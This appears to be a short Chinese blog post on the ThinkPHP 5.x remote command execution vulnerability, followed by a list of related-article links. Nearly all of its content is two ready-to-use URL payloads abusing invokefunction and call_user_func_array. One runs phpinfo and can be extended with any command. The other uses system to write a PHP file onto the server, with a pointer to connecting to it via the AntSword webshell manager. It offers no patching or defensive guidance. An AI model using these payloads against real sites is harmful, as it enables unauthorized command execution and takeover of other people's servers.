常见框架漏洞:Thinkphp(TP)篇

简介

ThinkPHP (简称 TP )是一款流行的 国产开源 PHP 框架 ,遵循 MVC(Model-View-Controller) 设计模式,以简洁、高效、灵活著称,广泛应用于国内中小型 Web 项目开发。

Thinkphp5x远程命令执行及getshell

原理

rce

过程

打开网站

复制代码
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[
1][]=-1

在后面拼接指令即可

getshell

复制代码
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]
[]=echo "<?php phpinfo();?>" >>1.php

访问后使用蚁剑链接即可

相关推荐
非凡的世界3 天前
Thinkphp8 Redis队列与消息队列topthink/think-queue 原创
数据库·redis·bootstrap·thinkphp
非凡的世界4 天前
ThinkPHP8集成RabbitMQ的完整案例实现 原创
rabbitmq·thinkphp
未来之窗软件服务5 天前
UI设计(三)按实际输出内容递增的序号效果——东方仙盟筑基期
ui·thinkphp·仙盟创梦ide·东方仙盟sdk
奔跑吧邓邓子12 天前
【C++实战(75)】筑牢安全防线,攻克漏洞难题
c++·安全·实战·漏洞
黑客思维者15 天前
Notepad++中高危DLL劫持漏洞深度剖析
notepad++·漏洞·dll劫持
王嘉俊92518 天前
ThinkPHP 入门:快速构建 PHP Web 应用的强大框架
开发语言·前端·后端·php·框架·thinkphp
李白你好1 个月前
CVE-2025-2502 / CNVD-2025-16450 联想电脑管家权限提升漏洞
漏洞
网络研究院2 个月前
Citrix 零日漏洞自五月起遭积极利用
网络·安全·漏洞·威胁
蓝黑20202 个月前
阿里云ECS服务器搭建ThinkPHP环境
服务器·阿里云·thinkphp
网络研究院2 个月前
新的 SHAMOS MacOS 窃取程序利用单行终端命令攻击用户
macos·攻击·漏洞·用户